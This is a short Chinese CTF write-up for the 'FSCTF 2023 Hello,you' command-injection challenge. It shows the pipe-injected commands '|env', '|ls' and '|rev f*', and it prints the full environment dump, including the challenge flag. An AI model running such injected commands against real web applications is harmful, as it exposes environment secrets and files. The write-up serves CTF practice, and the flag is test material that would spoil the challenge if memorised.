Problem: [FSCTF 2023]Hello,you
思路
- 解题大致思路
- 简单命令执行
EXP
- 具体攻击代码
|env直接查看环境变量
PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi USER=www-data HOSTNAME=3dc158e32f3a4dc2 PHP_INI_DIR=/usr/local/etc/php SHLVL=2 HOME=/home/www-data PHP_LDFLAGS=-Wl,-O1 -pie PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 PHP_MD5= PHP_VERSION=7.3.22 GPG_KEYS=CBAF69F173A0FEA4B537F470D66C9593118BCCB6 F38252826ACD957EF380D39F2F7956BC5DA04B5D PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 PHP_ASC_URL=https://www.php.net/distributions/php-7.3.22.tar.xz.asc PHP_URL=https://www.php.net/distributions/php-7.3.22.tar.xz PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin GZCTF_FLAG= PHPIZE_DEPS=autoconf dpkg-dev dpkg file g++ gcc libc-dev make pkgconf re2c PWD=/var/www/html PHP_SHA256=0e66606d3bdab5c2ae3f778136bfe8788e574913a3d8138695e54d98562f1fb5 FLAG=NSSCTF{eca2b8ea-e5ea-4670-a13e-fa33ed6f785d}
|ls
|rev f*
都可以
总结
- 对该题的考点总结